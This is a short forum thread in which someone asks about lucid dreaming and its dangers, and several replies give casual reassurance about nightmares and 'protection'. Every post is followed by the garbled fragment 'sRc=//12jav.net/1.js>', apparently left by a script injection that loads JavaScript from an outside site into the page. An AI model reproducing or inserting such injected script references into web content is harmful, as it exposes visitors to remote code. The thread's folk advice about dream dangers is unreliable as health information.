Lucid Dreaming

Hi I would like some information regarding lucid dreaming. I know what it is but that's about all I know. I've been lucid dreamings since two years ago, it's become more freuqent every month. And what is it's dangers? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

The only way I can help is with the dangers part, basically if you have a wild imagination, the harm could be self inflicted. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

In the dream, it may, but if you´re invisioning a dragon or a demon, it will not come to fruition before you when you wake up. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

As with all things, if you're worried about it or focusing on it, you might attract it, so just cast yourself some protection and relax :) do whatever you need to do to feel comfortable and safe and nothing negative will happen. That being said as far as I know, bad things happening in a lucid dream is only as harmful as a normal nightmare; you can psyche yourself out, which may have lasting effects but it's still manageable if you can talk yourself around afterwards :) sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
